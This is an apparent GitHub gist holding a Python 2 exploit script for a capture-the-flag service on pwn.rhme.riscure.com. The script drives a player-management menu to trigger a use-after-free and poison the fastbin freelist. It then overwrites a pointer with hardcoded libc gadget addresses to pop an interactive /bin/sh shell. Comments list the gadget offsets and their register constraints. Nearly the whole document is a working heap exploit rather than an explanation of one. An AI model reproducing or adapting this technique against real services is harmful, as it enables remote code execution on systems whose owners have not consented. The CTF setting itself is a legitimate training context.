#!/usr/bin/env python | |
import socket | |
import time | |
import telnetlib | |
import struct | |
LIBC_BASE = 0x7eff13bcb000 | |
HEAP_BASE = 0x248b000 | |
SLEEP_TIME = 1 | |
t = telnetlib.Telnet() | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.connect(("pwn.rhme.riscure.com",1337)) | |
#s.connect(("127.0.0.1",1337)) | |
def doRecv(): | |
print "<< ", s.recv(1024) | |
time.sleep(SLEEP_TIME) | |
def doSend(data): | |
print ">> ", data | |
s.send(data + "\n") | |
time.sleep(SLEEP_TIME) | |
doRecv() | |
blahfuck = raw_input('attach debugger and press enter..') | |
doRecv() | |
doSend("1") # add our fake chunk player | |
doSend("fake") | |
doSend("33") | |
doSend("0") | |
doSend("33") | |
doSend("0") | |
doSend("1") | |
doSend("hax") # add a player | |
doSend("1") | |
doSend("1") | |
doSend("1") | |
doSend("1") | |
doSend("3") # get a pointer to it | |
doSend("1") | |
doSend("2") # free underlying data | |
doSend("1") | |
doSend("4") | |
doSend("1") | |
# the below is a heap offset | this is 0x1620 offset from heap base. | |
# heap base == 0x1a34000 | |
# offset: 0x1620 | |
# == 0x1a35620 | |
doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk | |
doSend("0") | |
doSend("1") | |
doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist | |
doSend("3") # so our poisoned malloc is in response to the Name malloc | |
doSend("3") | |
doSend("3") | |
doSend("3") | |
doSend("1") | |
doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will | |
doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of | |
doSend("4") # of our choosing | |
doSend("4") | |
doSend("4") | |
doSend("3") | |
doSend("0") | |
doSend("4") | |
doSend("1") | |
doSend(struct.pack('<Q', LIBC_BASE + 0x101f80)) | |
doSend("1") | |
g1 = struct.pack('<Q', LIBC_BASE + 0x34a70) | |
g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78) | |
g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3) | |
s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n") | |
t.sock = s | |
t.interact() | |
# /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null | libc offset 0xcd0f3 | |
# /bin/sh 0x7f503050d6c0 | |
# 0x7f5030436b7b 0x1fb7b xor eax eax, ret | |
# 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret | |
# 0x7f5030436b78 0x1fb78 pop r12, ret |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment